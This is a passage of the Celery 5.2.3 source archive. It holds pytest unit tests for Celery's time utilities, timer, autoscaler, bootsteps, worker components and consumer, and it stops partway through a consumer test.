celery-5.2.3/t/unit/utils/test_time.py0000664000175000017500000002672200000000000017637 0ustar00asifasif00000000000000from datetime import datetime, timedelta, tzinfo from unittest.mock import Mock, patch import pytest import pytz from pytz import 
AmbiguousTimeError from celery.utils.iso8601 import parse_iso8601 from celery.utils.time import (LocalTimezone, delta_resolution, ffwd, get_exponential_backoff_interval, humanize_seconds, localize, make_aware, maybe_iso8601, maybe_make_aware, maybe_timedelta, rate, remaining, timezone, utcoffset) class test_LocalTimezone: def test_daylight(self, patching): time = patching('celery.utils.time._time') time.timezone = 3600 time.daylight = False x = LocalTimezone() assert x.STDOFFSET == timedelta(seconds=-3600) assert x.DSTOFFSET == x.STDOFFSET time.daylight = True time.altzone = 3600 y = LocalTimezone() assert y.STDOFFSET == timedelta(seconds=-3600) assert y.DSTOFFSET == timedelta(seconds=-3600) assert repr(y) y._isdst = Mock() y._isdst.return_value = True assert y.utcoffset(datetime.now()) assert not y.dst(datetime.now()) y._isdst.return_value = False assert y.utcoffset(datetime.now()) assert not y.dst(datetime.now()) assert y.tzname(datetime.now()) class test_iso8601: def test_parse_with_timezone(self): d = datetime.utcnow().replace(tzinfo=pytz.utc) assert parse_iso8601(d.isoformat()) == d # 2013-06-07T20:12:51.775877+00:00 iso = d.isoformat() iso1 = iso.replace('+00:00', '-01:00') d1 = parse_iso8601(iso1) assert d1.tzinfo._minutes == -60 iso2 = iso.replace('+00:00', '+01:00') d2 = parse_iso8601(iso2) assert d2.tzinfo._minutes == +60 iso3 = iso.replace('+00:00', 'Z') d3 = parse_iso8601(iso3) assert d3.tzinfo == pytz.UTC @pytest.mark.parametrize('delta,expected', [ (timedelta(days=2), datetime(2010, 3, 30, 0, 0)), (timedelta(hours=2), datetime(2010, 3, 30, 11, 0)), (timedelta(minutes=2), datetime(2010, 3, 30, 11, 50)), (timedelta(seconds=2), None), ]) def test_delta_resolution(delta, expected): dt = datetime(2010, 3, 30, 11, 50, 58, 41065) assert delta_resolution(dt, delta) == expected or dt @pytest.mark.parametrize('seconds,expected', [ (4 * 60 * 60 * 24, '4.00 days'), (1 * 60 * 60 * 24, '1.00 day'), (4 * 60 * 60, '4.00 hours'), (1 * 60 * 60, '1.00 hour'), (4 * 60, '4.00 minutes'), (1 * 60, '1.00 minute'), (4, '4.00 seconds'), (1, '1.00 second'), (4.3567631221, '4.36 seconds'), (0, 'now'), ]) def test_humanize_seconds(seconds, expected): assert humanize_seconds(seconds) == expected def test_humanize_seconds__prefix(): assert humanize_seconds(4, prefix='about ') == 'about 4.00 seconds' def test_maybe_iso8601_datetime(): now = datetime.now() assert maybe_iso8601(now) is now @pytest.mark.parametrize('arg,expected', [ (30, timedelta(seconds=30)), (30.6, timedelta(seconds=30.6)), (timedelta(days=2), timedelta(days=2)), ]) def test_maybe_timedelta(arg, expected): assert maybe_timedelta(arg) == expected def test_remaining(): # Relative remaining(datetime.utcnow(), timedelta(hours=1), relative=True) """ The upcoming cases check whether the next run is calculated correctly """ eastern_tz = pytz.timezone("US/Eastern") tokyo_tz = pytz.timezone("Asia/Tokyo") # Case 1: `start` in UTC and `now` in other timezone start = datetime.now(pytz.utc) now = datetime.now(eastern_tz) delta = timedelta(hours=1) assert str(start.tzinfo) == str(pytz.utc) assert str(now.tzinfo) == str(eastern_tz) rem_secs = remaining(start, delta, now).total_seconds() # assert remaining time is approximately equal to delta assert rem_secs == pytest.approx(delta.total_seconds(), abs=1) # Case 2: `start` and `now` in different timezones (other than UTC) start = datetime.now(eastern_tz) now = datetime.now(tokyo_tz) delta = timedelta(hours=1) assert str(start.tzinfo) == str(eastern_tz) assert str(now.tzinfo) == str(tokyo_tz) rem_secs = 
remaining(start, delta, now).total_seconds() assert rem_secs == pytest.approx(delta.total_seconds(), abs=1) """ Case 3: DST check Suppose start (which is last_run_time) is in EST while next_run is in EDT, then check whether the `next_run` is actually the time specified in the start (i.e. there is not an hour diff due to DST). In 2019, DST starts on March 10 """ start = eastern_tz.localize(datetime(month=3, day=9, year=2019, hour=10, minute=0)) # EST now = eastern_tz.localize(datetime(day=11, month=3, year=2019, hour=1, minute=0)) # EDT delta = ffwd(hour=10, year=2019, microsecond=0, minute=0, second=0, day=11, weeks=0, month=3) # `next_actual_time` is the next time to run (derived from delta) next_actual_time = eastern_tz.localize(datetime(day=11, month=3, year=2019, hour=10, minute=0)) # EDT assert start.tzname() == "EST" assert now.tzname() == "EDT" assert next_actual_time.tzname() == "EDT" rem_time = remaining(start, delta, now) next_run = now + rem_time assert next_run == next_actual_time class test_timezone: def test_get_timezone_with_pytz(self): assert timezone.get_timezone('UTC') def test_tz_or_local(self): assert timezone.tz_or_local() == timezone.local assert timezone.tz_or_local(timezone.utc) def test_to_local(self): assert timezone.to_local(make_aware(datetime.utcnow(), timezone.utc)) assert timezone.to_local(datetime.utcnow()) def test_to_local_fallback(self): assert timezone.to_local_fallback( make_aware(datetime.utcnow(), timezone.utc)) assert timezone.to_local_fallback(datetime.utcnow()) class test_make_aware: def test_tz_without_localize(self): tz = tzinfo() assert not hasattr(tz, 'localize') wtz = make_aware(datetime.utcnow(), tz) assert wtz.tzinfo == tz def test_when_has_localize(self): class tzz(tzinfo): raises = False def localize(self, dt, is_dst=None): self.localized = True if self.raises and is_dst is None: self.raised = True raise AmbiguousTimeError() return 1 # needed by min() in Python 3 (None not hashable) tz = tzz() make_aware(datetime.utcnow(), tz) assert tz.localized tz2 = tzz() tz2.raises = True make_aware(datetime.utcnow(), tz2) assert tz2.localized assert tz2.raised def test_maybe_make_aware(self): aware = datetime.utcnow().replace(tzinfo=timezone.utc) assert maybe_make_aware(aware) naive = datetime.utcnow() assert maybe_make_aware(naive) assert maybe_make_aware(naive).tzinfo is pytz.utc tz = pytz.timezone('US/Eastern') eastern = datetime.utcnow().replace(tzinfo=tz) assert maybe_make_aware(eastern).tzinfo is tz utcnow = datetime.utcnow() assert maybe_make_aware(utcnow, 'UTC').tzinfo is pytz.utc class test_localize: def test_tz_without_normalize(self): class tzz(tzinfo): def utcoffset(self, dt): return None # Mock no utcoffset specified tz = tzz() assert not hasattr(tz, 'normalize') assert localize(make_aware(datetime.utcnow(), tz), tz) def test_when_has_normalize(self): class tzz(tzinfo): raises = None def utcoffset(self, dt): return None def normalize(self, dt, **kwargs): self.normalized = True if self.raises and kwargs and kwargs.get('is_dst') is None: self.raised = True raise self.raises return 1 # needed by min() in Python 3 (None not hashable) tz = tzz() localize(make_aware(datetime.utcnow(), tz), tz) assert tz.normalized tz2 = tzz() tz2.raises = AmbiguousTimeError() localize(make_aware(datetime.utcnow(), tz2), tz2) assert tz2.normalized assert tz2.raised tz3 = tzz() tz3.raises = TypeError() localize(make_aware(datetime.utcnow(), tz3), tz3) assert tz3.normalized assert tz3.raised def test_localize_changes_utc_dt(self): now_utc_time = 
datetime.now(tz=pytz.utc) local_tz = pytz.timezone('US/Eastern') localized_time = localize(now_utc_time, local_tz) assert localized_time == now_utc_time def test_localize_aware_dt_idempotent(self): t = (2017, 4, 23, 21, 36, 59, 0) local_zone = pytz.timezone('America/New_York') local_time = datetime(*t) local_time_aware = datetime(*t, tzinfo=local_zone) alternate_zone = pytz.timezone('America/Detroit') localized_time = localize(local_time_aware, alternate_zone) assert localized_time == local_time_aware assert local_zone.utcoffset( local_time) == alternate_zone.utcoffset(local_time) localized_utc_offset = localized_time.tzinfo.utcoffset(local_time) assert localized_utc_offset == alternate_zone.utcoffset(local_time) assert localized_utc_offset == local_zone.utcoffset(local_time) @pytest.mark.parametrize('s,expected', [ (999, 999), (7.5, 7.5), ('2.5/s', 2.5), ('1456/s', 1456), ('100/m', 100 / 60.0), ('10/h', 10 / 60.0 / 60.0), (0, 0), (None, 0), ('0/m', 0), ('0/h', 0), ('0/s', 0), ('0.0/s', 0), ]) def test_rate_limit_string(s, expected): assert rate(s) == expected class test_ffwd: def test_repr(self): x = ffwd(year=2012) assert repr(x) def test_radd_with_unknown_gives_NotImplemented(self): x = ffwd(year=2012) assert x.__radd__(object()) == NotImplemented class test_utcoffset: def test_utcoffset(self, patching): _time = patching('celery.utils.time._time') _time.daylight = True assert utcoffset(time=_time) is not None _time.daylight = False assert utcoffset(time=_time) is not None class test_get_exponential_backoff_interval: @patch('random.randrange', lambda n: n - 2) def test_with_jitter(self): assert get_exponential_backoff_interval( factor=4, retries=3, maximum=100, full_jitter=True ) == 4 * (2 ** 3) - 1 def test_without_jitter(self): assert get_exponential_backoff_interval( factor=4, retries=3, maximum=100, full_jitter=False ) == 4 * (2 ** 3) def test_bound_by_maximum(self): maximum_boundary = 100 assert get_exponential_backoff_interval( factor=40, retries=3, maximum=maximum_boundary ) == maximum_boundary @patch('random.randrange', lambda n: n - 1) def test_negative_values(self): assert get_exponential_backoff_interval( factor=-40, retries=3, maximum=100 ) == 0 @patch('random.randrange') def test_valid_random_range(self, rr): rr.return_value = 0 maximum = 100 get_exponential_backoff_interval(factor=40, retries=10, maximum=maximum, full_jitter=True) rr.assert_called_once_with(maximum + 1) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_timer2.py0000664000175000017500000000621700000000000020100 0ustar00asifasif00000000000000import sys import time from unittest.mock import Mock, call, patch from celery.utils import timer2 as timer2 class test_Timer: def test_enter_after(self): t = timer2.Timer() try: done = [False] def set_done(): done[0] = True t.call_after(0.3, set_done) mss = 0 while not done[0]: if mss >= 2.0: raise Exception('test timed out') time.sleep(0.1) mss += 0.1 finally: t.stop() def test_exit_after(self): t = timer2.Timer() t.call_after = Mock() t.exit_after(0.3, priority=10) t.call_after.assert_called_with(0.3, sys.exit, 10) def test_ensure_started_not_started(self): t = timer2.Timer() t.running = True t.start = Mock() t.ensure_started() t.start.assert_not_called() t.running = False t.on_start = Mock() t.ensure_started() t.on_start.assert_called_with(t) t.start.assert_called_with() @patch('celery.utils.timer2.sleep') @patch('os._exit') # To ensure the test fails gracefully def 
test_on_tick(self, _exit, sleep): def next_entry_side_effect(): # side effect simulating following scenario: # 3.33, 3.33, 3.33, for _ in range(3): yield 3.33 while True: yield getattr(t, "_Timer__is_shutdown").set() on_tick = Mock(name='on_tick') t = timer2.Timer(on_tick=on_tick) t._next_entry = Mock( name='_next_entry', side_effect=next_entry_side_effect() ) t.run() sleep.assert_called_with(3.33) on_tick.assert_has_calls([call(3.33), call(3.33), call(3.33)]) _exit.assert_not_called() @patch('os._exit') def test_thread_crash(self, _exit): t = timer2.Timer() t._next_entry = Mock() t._next_entry.side_effect = OSError(131) t.run() _exit.assert_called_with(1) def test_gc_race_lost(self): t = timer2.Timer() with patch.object(t, "_Timer__is_stopped") as mock_stop_event: # Mark the timer as shutting down so we escape the run loop, # mocking the running state so we don't block! with patch.object(t, "running", new=False): t.stop() # Pretend like the interpreter has shutdown and GCed built-in # modules, causing an exception mock_stop_event.set.side_effect = TypeError() t.run() mock_stop_event.set.assert_called_with() def test_test_enter(self): t = timer2.Timer() t._do_enter = Mock() e = Mock() t.enter(e, 13, 0) t._do_enter.assert_called_with('enter_at', e, 13, priority=0) def test_test_enter_after(self): t = timer2.Timer() t._do_enter = Mock() t.enter_after() t._do_enter.assert_called_with('enter_after') def test_cancel(self): t = timer2.Timer() tref = Mock() t.cancel(tref) tref.cancel.assert_called_with() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_utils.py0000664000175000017500000000116000000000000020026 0ustar00asifasif00000000000000import pytest from celery.utils import cached_property, chunks @pytest.mark.parametrize('items,n,expected', [ (range(11), 2, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]]), (range(11), 3, [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]]), (range(10), 2, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]), ]) def test_chunks(items, n, expected): x = chunks(iter(list(items)), n) assert list(x) == expected def test_cached_property(): def fun(obj): return fun.value x = cached_property(fun) assert x.__get__(None) is x assert x.__set__(None, None) is x assert x.__delete__(None) is x ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8637578 celery-5.2.3/t/unit/worker/0000775000175000017500000000000000000000000015430 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/__init__.py0000664000175000017500000000000000000000000017527 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_autoscale.py0000664000175000017500000001661700000000000021034 0ustar00asifasif00000000000000import sys from time import monotonic from unittest.mock import Mock, patch import pytest from celery.concurrency.base import BasePool from celery.utils.objects import Bunch from celery.worker import autoscale, state class MockPool(BasePool): shrink_raises_exception = False shrink_raises_ValueError = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._pool = Bunch(_processes=self.limit) def grow(self, n=1): self._pool._processes += n def shrink(self, n=1): if self.shrink_raises_exception: raise KeyError('foo') if 
self.shrink_raises_ValueError: raise ValueError('foo') self._pool._processes -= n @property def num_processes(self): return self._pool._processes class test_WorkerComponent: def test_register_with_event_loop(self): parent = Mock(name='parent') parent.autoscale = True parent.consumer.on_task_message = set() w = autoscale.WorkerComponent(parent) assert parent.autoscaler is None assert w.enabled hub = Mock(name='hub') w.create(parent) w.register_with_event_loop(parent, hub) assert (parent.autoscaler.maybe_scale in parent.consumer.on_task_message) hub.call_repeatedly.assert_called_with( parent.autoscaler.keepalive, parent.autoscaler.maybe_scale, ) parent.hub = hub hub.on_init = [] w.instantiate = Mock() w.register_with_event_loop(parent, Mock(name='loop')) assert parent.consumer.on_task_message def test_info_without_event_loop(self): parent = Mock(name='parent') parent.autoscale = True parent.max_concurrency = '10' parent.min_concurrency = '2' parent.use_eventloop = False w = autoscale.WorkerComponent(parent) w.create(parent) info = w.info(parent) assert 'autoscaler' in info assert parent.autoscaler_cls().info.called class test_Autoscaler: def setup(self): self.pool = MockPool(3) def test_stop(self): class Scaler(autoscale.Autoscaler): alive = True joined = False def is_alive(self): return self.alive def join(self, timeout=None): self.joined = True worker = Mock(name='worker') x = Scaler(self.pool, 10, 3, worker=worker) # Don't allow thread joining or event waiting to block the test with patch("threading.Thread.join"), patch("threading.Event.wait"): x.stop() assert x.joined x.joined = False x.alive = False with patch("threading.Thread.join"), patch("threading.Event.wait"): x.stop() assert not x.joined @pytest.mark.sleepdeprived_patched_module(autoscale) def test_body(self, sleepdeprived): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.body() assert x.pool.num_processes == 3 _keep = [Mock(name=f'req{i}') for i in range(20)] [state.task_reserved(m) for m in _keep] x.body() x.body() assert x.pool.num_processes == 10 state.reserved_requests.clear() x.body() assert x.pool.num_processes == 10 x._last_scale_up = monotonic() - 10000 x.body() assert x.pool.num_processes == 3 def test_run(self): class Scaler(autoscale.Autoscaler): scale_called = False def body(self): self.scale_called = True getattr(self, "_bgThread__is_shutdown").set() worker = Mock(name='worker') x = Scaler(self.pool, 10, 3, worker=worker) x.run() assert getattr(x, "_bgThread__is_shutdown").is_set() assert getattr(x, "_bgThread__is_stopped").is_set() assert x.scale_called def test_shrink_raises_exception(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.scale_up(3) x.pool.shrink_raises_exception = True x._shrink(1) @patch('celery.worker.autoscale.debug') def test_shrink_raises_ValueError(self, debug): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.scale_up(3) x._last_scale_up = monotonic() - 10000 x.pool.shrink_raises_ValueError = True x.scale_down(1) assert debug.call_count def test_update(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 1 x.keepalive = -1 assert x.processes == 3 x.scale_up(5) x.update(7, None) assert x.processes == 7 assert x.max_concurrency == 7 x.scale_down(4) x.update(None, 6) assert x.processes == 6 assert x.min_concurrency == 6 x.update(max=300, min=10) x.update(max=300, min=2) x.update(max=None, 
min=None) def test_prefetch_count_on_updates(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 1 x.update(5, None) worker.consumer._update_prefetch_count.assert_called_with(-5) x.update(15, 7) worker.consumer._update_prefetch_count.assert_called_with(10) def test_prefetch_count_on_updates_prefetch_multiplier_gt_one(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.worker.consumer.prefetch_multiplier = 4 x.update(5, None) worker.consumer._update_prefetch_count.assert_called_with(-5) x.update(15, 7) worker.consumer._update_prefetch_count.assert_called_with(10) def test_info(self): worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) info = x.info() assert info['max'] == 10 assert info['min'] == 3 assert info['current'] == 3 @patch('os._exit') def test_thread_crash(self, _exit): class _Autoscaler(autoscale.Autoscaler): def body(self): getattr(self, "_bgThread__is_shutdown").set() raise OSError('foo') worker = Mock(name='worker') x = _Autoscaler(self.pool, 10, 3, worker=worker) stderr = Mock() p, sys.stderr = sys.stderr, stderr try: x.run() finally: sys.stderr = p _exit.assert_called_with(1) stderr.write.assert_called() @pytest.mark.sleepdeprived_patched_module(autoscale) def test_no_negative_scale(self, sleepdeprived): total_num_processes = [] worker = Mock(name='worker') x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker) x.body() # the body func scales up or down _keep = [Mock(name=f'req{i}') for i in range(35)] for req in _keep: state.task_reserved(req) x.body() total_num_processes.append(self.pool.num_processes) for req in _keep: state.task_ready(req) x.body() total_num_processes.append(self.pool.num_processes) assert all(x.min_concurrency <= i <= x.max_concurrency for i in total_num_processes) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_bootsteps.py0000664000175000017500000002227100000000000021067 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest from celery import bootsteps class test_StepFormatter: def test_get_prefix(self): f = bootsteps.StepFormatter() s = Mock() s.last = True assert f._get_prefix(s) == f.blueprint_prefix s2 = Mock() s2.last = False s2.conditional = True assert f._get_prefix(s2) == f.conditional_prefix s3 = Mock() s3.last = s3.conditional = False assert f._get_prefix(s3) == '' def test_node(self): f = bootsteps.StepFormatter() f.draw_node = Mock() step = Mock() step.last = False f.node(step, x=3) f.draw_node.assert_called_with(step, f.node_scheme, {'x': 3}) step.last = True f.node(step, x=3) f.draw_node.assert_called_with(step, f.blueprint_scheme, {'x': 3}) def test_edge(self): f = bootsteps.StepFormatter() f.draw_edge = Mock() a, b = Mock(), Mock() a.last = True f.edge(a, b, x=6) f.draw_edge.assert_called_with(a, b, f.edge_scheme, { 'x': 6, 'arrowhead': 'none', 'color': 'darkseagreen3', }) a.last = False f.edge(a, b, x=6) f.draw_edge.assert_called_with(a, b, f.edge_scheme, { 'x': 6, }) class test_Step: class Def(bootsteps.StartStopStep): name = 'test_Step.Def' def setup(self): self.steps = [] def test_blueprint_name(self, bp='test_blueprint_name'): class X(bootsteps.Step): blueprint = bp name = 'X' assert X.name == 'X' class Y(bootsteps.Step): name = '%s.Y' % bp assert Y.name == f'{bp}.Y' def test_init(self): assert self.Def(self) def test_create(self): 
self.Def(self).create(self) def test_include_if(self): x = self.Def(self) x.enabled = True assert x.include_if(self) x.enabled = False assert not x.include_if(self) def test_instantiate(self): assert isinstance( self.Def(self).instantiate(self.Def, self), self.Def, ) def test_include_when_enabled(self): x = self.Def(self) x.create = Mock() x.create.return_value = 'George' assert x.include(self) assert x.obj == 'George' x.create.assert_called_with(self) def test_include_when_disabled(self): x = self.Def(self) x.enabled = False x.create = Mock() assert not x.include(self) x.create.assert_not_called() def test_repr(self): x = self.Def(self) assert repr(x) class test_ConsumerStep: def test_interface(self): step = bootsteps.ConsumerStep(self) with pytest.raises(NotImplementedError): step.get_consumers(self) def test_start_stop_shutdown(self): consumer = Mock() self.connection = Mock() class Step(bootsteps.ConsumerStep): def get_consumers(self, c): return [consumer] step = Step(self) assert step.get_consumers(self) == [consumer] step.start(self) consumer.consume.assert_called_with() step.stop(self) consumer.cancel.assert_called_with() step.shutdown(self) consumer.channel.close.assert_called_with() def test_start_no_consumers(self): self.connection = Mock() class Step(bootsteps.ConsumerStep): def get_consumers(self, c): return () step = Step(self) step.start(self) def test_close_no_consumer_channel(self): step = bootsteps.ConsumerStep(Mock()) step.consumers = [Mock()] step.consumers[0].channel = None step._close(Mock()) class test_StartStopStep: class Def(bootsteps.StartStopStep): name = 'test_StartStopStep.Def' def setup(self): self.steps = [] def test_start__stop(self): x = self.Def(self) x.create = Mock() # include creates the underlying object and sets # its x.obj attribute to it, as well as appending # it to the parent.steps list. 
x.include(self) assert self.steps assert self.steps[0] is x x.start(self) x.obj.start.assert_called_with() x.stop(self) x.obj.stop.assert_called_with() x.obj = None assert x.start(self) is None def test_terminate__no_obj(self): x = self.Def(self) x.obj = None x.terminate(Mock()) def test_include_when_disabled(self): x = self.Def(self) x.enabled = False x.include(self) assert not self.steps def test_terminate(self): x = self.Def(self) x.create = Mock() x.include(self) delattr(x.obj, 'terminate') x.terminate(self) x.obj.stop.assert_called_with() class test_Blueprint: class Blueprint(bootsteps.Blueprint): name = 'test_Blueprint' def test_steps_added_to_unclaimed(self): class tnA(bootsteps.Step): name = 'test_Blueprint.A' class tnB(bootsteps.Step): name = 'test_Blueprint.B' class xxA(bootsteps.Step): name = 'xx.A' class Blueprint(self.Blueprint): default_steps = [tnA, tnB] blueprint = Blueprint() assert tnA in blueprint.types assert tnB in blueprint.types assert xxA not in blueprint.types def test_init(self): blueprint = self.Blueprint() assert blueprint.name == 'test_Blueprint' def test_close__on_close_is_None(self): blueprint = self.Blueprint() blueprint.on_close = None blueprint.send_all = Mock() blueprint.close(1) blueprint.send_all.assert_called_with( 1, 'close', 'closing', reverse=False, ) def test_send_all_with_None_steps(self): parent = Mock() blueprint = self.Blueprint() parent.steps = [None, None, None] blueprint.send_all(parent, 'close', 'Closing', reverse=False) def test_send_all_raises(self): parent = Mock() blueprint = self.Blueprint() parent.steps = [Mock()] parent.steps[0].foo.side_effect = KeyError() blueprint.send_all(parent, 'foo', propagate=False) with pytest.raises(KeyError): blueprint.send_all(parent, 'foo', propagate=True) def test_stop_state_in_TERMINATE(self): blueprint = self.Blueprint() blueprint.state = bootsteps.TERMINATE blueprint.stop(Mock()) def test_join_raises_IGNORE_ERRORS(self): prev, bootsteps.IGNORE_ERRORS = bootsteps.IGNORE_ERRORS, (KeyError,) try: blueprint = self.Blueprint() blueprint.shutdown_complete = Mock() blueprint.shutdown_complete.wait.side_effect = KeyError('luke') blueprint.join(timeout=10) blueprint.shutdown_complete.wait.assert_called_with(timeout=10) finally: bootsteps.IGNORE_ERRORS = prev def test_connect_with(self): class b1s1(bootsteps.Step): pass class b1s2(bootsteps.Step): last = True class b2s1(bootsteps.Step): pass class b2s2(bootsteps.Step): last = True b1 = self.Blueprint([b1s1, b1s2]) b2 = self.Blueprint([b2s1, b2s2]) b1.apply(Mock()) b2.apply(Mock()) b1.connect_with(b2) assert b1s1 in b1.graph assert b2s1 in b1.graph assert b2s2 in b1.graph assert repr(b1s1) assert str(b1s1) def test_topsort_raises_KeyError(self): class Step(bootsteps.Step): requires = ('xyxxx.fsdasewe.Unknown',) b = self.Blueprint([Step]) b.steps = b.claim_steps() with pytest.raises(ImportError): b._finalize_steps(b.steps) Step.requires = () b.steps = b.claim_steps() b._finalize_steps(b.steps) with patch('celery.bootsteps.DependencyGraph') as Dep: g = Dep.return_value = Mock() g.topsort.side_effect = KeyError('foo') with pytest.raises(KeyError): b._finalize_steps(b.steps) def test_apply(self): class MyBlueprint(bootsteps.Blueprint): name = 'test_apply' def modules(self): return ['A', 'B'] class B(bootsteps.Step): name = 'test_apply.B' class C(bootsteps.Step): name = 'test_apply.C' requires = [B] class A(bootsteps.Step): name = 'test_apply.A' requires = [C] class D(bootsteps.Step): name = 'test_apply.D' last = True x = MyBlueprint([A, D]) x.apply(self) assert 
isinstance(x.order[0], B) assert isinstance(x.order[1], C) assert isinstance(x.order[2], A) assert isinstance(x.order[3], D) assert A in x.types assert x[A.name] is x.order[2] def test_find_last_but_no_steps(self): class MyBlueprint(bootsteps.Blueprint): name = 'qwejwioqjewoqiej' x = MyBlueprint() x.apply(self) assert x._find_last() is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_components.py0000664000175000017500000000462600000000000021236 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest import t.skip from celery.exceptions import ImproperlyConfigured from celery.worker.components import Beat, Hub, Pool, Timer # some of these are tested in test_worker, so I've only written tests # here to complete coverage. Should move everything to this module at some # point [-ask] class test_Timer: def test_create__eventloop(self): w = Mock(name='w') w.use_eventloop = True Timer(w).create(w) assert not w.timer.queue class test_Hub: def setup(self): self.w = Mock(name='w') self.hub = Hub(self.w) self.w.hub = Mock(name='w.hub') @patch('celery.worker.components.set_event_loop') @patch('celery.worker.components.get_event_loop') def test_create(self, get_event_loop, set_event_loop): self.hub._patch_thread_primitives = Mock(name='ptp') assert self.hub.create(self.w) is self.hub self.hub._patch_thread_primitives.assert_called_with(self.w) def test_start(self): self.hub.start(self.w) def test_stop(self): self.hub.stop(self.w) self.w.hub.close.assert_called_with() def test_terminate(self): self.hub.terminate(self.w) self.w.hub.close.assert_called_with() class test_Pool: def test_close_terminate(self): w = Mock() comp = Pool(w) pool = w.pool = Mock() comp.close(w) pool.close.assert_called_with() comp.terminate(w) pool.terminate.assert_called_with() w.pool = None comp.close(w) comp.terminate(w) @t.skip.if_win32 def test_create_when_eventloop(self): w = Mock() w.use_eventloop = w.pool_putlocks = w.pool_cls.uses_semaphore = True comp = Pool(w) w.pool = Mock() comp.create(w) assert w.process_task is w._process_task_sem def test_create_calls_instantiate_with_max_memory(self): w = Mock() w.use_eventloop = w.pool_putlocks = w.pool_cls.uses_semaphore = True comp = Pool(w) comp.instantiate = Mock() w.max_memory_per_child = 32 comp.create(w) assert comp.instantiate.call_args[1]['max_memory_per_child'] == 32 class test_Beat: def test_create__green(self): w = Mock(name='w') w.pool_cls.__module__ = 'foo_gevent' with pytest.raises(ImproperlyConfigured): Beat(w).create(w) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_consumer.py0000664000175000017500000005475000000000000020707 0ustar00asifasif00000000000000import errno import socket from collections import deque from unittest.mock import Mock, call, patch import pytest from billiard.exceptions import RestartFreqExceeded from celery.contrib.testing.mocks import ContextMock from celery.utils.collections import LimitedSet from celery.worker.consumer.agent import Agent from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE, TERMINATE, Consumer) from celery.worker.consumer.gossip import Gossip from celery.worker.consumer.heart import Heart from celery.worker.consumer.mingle import Mingle from celery.worker.consumer.tasks import Tasks from celery.worker.state import active_requests class test_Consumer: def get_consumer(self, no_hub=False, 
**kwargs): consumer = Consumer( on_task_request=Mock(), init_callback=Mock(), pool=Mock(), app=self.app, timer=Mock(), controller=Mock(), hub=None if no_hub else Mock(), **kwargs ) consumer.blueprint = Mock(name='blueprint') consumer._restart_state = Mock(name='_restart_state') consumer.connection = _amqp_connection() consumer.connection_errors = (socket.error, OSError,) consumer.conninfo = consumer.connection return consumer def test_repr(self): assert repr(self.get_consumer()) def test_taskbuckets_defaultdict(self): c = self.get_consumer() assert c.task_buckets['fooxasdwx.wewe'] is None def test_sets_heartbeat(self): c = self.get_consumer(amqheartbeat=10) assert c.amqheartbeat == 10 self.app.conf.broker_heartbeat = 20 c = self.get_consumer(amqheartbeat=None) assert c.amqheartbeat == 20 def test_gevent_bug_disables_connection_timeout(self): with patch('celery.worker.consumer.consumer._detect_environment') as d: d.return_value = 'gevent' self.app.conf.broker_connection_timeout = 33.33 self.get_consumer() assert self.app.conf.broker_connection_timeout is None def test_limit_moved_to_pool(self): with patch('celery.worker.consumer.consumer.task_reserved') as reserv: c = self.get_consumer() c.on_task_request = Mock(name='on_task_request') request = Mock(name='request') c._limit_move_to_pool(request) reserv.assert_called_with(request) c.on_task_request.assert_called_with(request) def test_update_prefetch_count(self): c = self.get_consumer() c._update_qos_eventually = Mock(name='update_qos') c.initial_prefetch_count = None c.pool.num_processes = None c.prefetch_multiplier = 10 assert c._update_prefetch_count(1) is None c.initial_prefetch_count = 10 c.pool.num_processes = 10 c._update_prefetch_count(8) c._update_qos_eventually.assert_called_with(8) assert c.initial_prefetch_count == 10 * 10 def test_flush_events(self): c = self.get_consumer() c.event_dispatcher = None c._flush_events() c.event_dispatcher = Mock(name='evd') c._flush_events() c.event_dispatcher.flush.assert_called_with() def test_on_send_event_buffered(self): c = self.get_consumer() c.hub = None c.on_send_event_buffered() c.hub = Mock(name='hub') c.on_send_event_buffered() c.hub._ready.add.assert_called_with(c._flush_events) def test_schedule_bucket_request(self): c = self.get_consumer() c.timer = Mock() bucket = Mock() request = Mock() bucket.pop = lambda: bucket.contents.popleft() bucket.can_consume.return_value = True bucket.contents = deque() with patch( 'celery.worker.consumer.consumer.Consumer._limit_move_to_pool' ) as reserv: bucket.contents.append((request, 3)) c._schedule_bucket_request(bucket) bucket.can_consume.assert_called_with(3) reserv.assert_called_with(request) bucket.can_consume.return_value = False bucket.contents = deque() bucket.expected_time.return_value = 3.33 bucket.contents.append((request, 4)) limit_order = c._limit_order c._schedule_bucket_request(bucket) assert c._limit_order == limit_order + 1 bucket.can_consume.assert_called_with(4) 